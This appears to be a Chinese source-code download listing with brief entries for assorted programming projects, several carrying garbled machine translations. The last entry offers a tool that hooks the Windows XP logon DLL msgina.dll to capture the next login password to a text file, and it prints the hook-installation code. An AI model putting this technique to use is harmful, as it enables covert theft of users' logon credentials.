-
一套DELPHI开发的指纹应用源码,可作为指纹应用整合使用!
一套DELPHI开发的指纹应用源码,可作为指纹应用整合使用!-a fingerprint application source code, can be used as application integration using fingerprints!
- 2022-03-10 02:39:44下载
- 积分:1
-
孙鑫的VC++源代码的教训
孙鑫vc++讲座源码01-05-Source code of SunXin s Vc++ lessons
- 2023-07-18 09:45:03下载
- 积分:1
-
c compiler source code
c语言编译器的源代码-c compiler source code
- 2022-11-27 05:25:02下载
- 积分:1
-
windows进程管理类
压缩包包含两个文件ProcessManager.h、ProcessManager.cpp可以直接使用
CProcessManager提供接口如下:
BOOL SetProcessId(DWORD dwProcessId);
BOOL EnableDebugPrivilege();
BOOL QueryProcessStatus
- 2023-08-01 04:35:03下载
- 积分:1
-
用MFC写的一个猜数字的小程序,可以存档,就是在填写数字的时候稍稍有些麻烦。...
用MFC写的一个猜数字的小程序,可以存档,就是在填写数字的时候稍稍有些麻烦。-with MFC wrote a small viewing the procedure can be archived, is filling in the figures slightly some trouble.
- 2022-07-24 19:20:49下载
- 积分:1
-
bos物流项目
主要技术,采用的传统框架struts 2 、spring 、hibernate,页面采用easyui,后台用到 hession远程调用客户服务crm系统,shiro框架做的认证和授权,activiti工作流做的自动分单和业务流转,工具eclipse,服务器用到tomcat、
- 2022-04-07 02:17:10下载
- 积分:1
-
c programs developed in compiler
c programs developed in compiler
- 2023-02-05 09:00:03下载
- 积分:1
-
Using Kruskal method to generate the minimum spanning tree, using VC6.0 developm...
利用克鲁斯卡尔方法生成最小生成树,用VC6.0开发的-Using Kruskal method to generate the minimum spanning tree, using VC6.0 development
- 2023-04-24 15:30:03下载
- 积分:1
-
小的MP3播放器。用MFC实现,调用系统自带的realplayer,可以通过编辑框自主选择播放的歌曲。...
小的MP3播放器。用MFC实现,调用系统自带的realplayer,可以通过编辑框自主选择播放的歌曲。-A small MP3 player. With the MFC implementation, call the system comes with realplayer, you can edit box to choose which songs to play.
- 2022-01-27 17:36:56下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1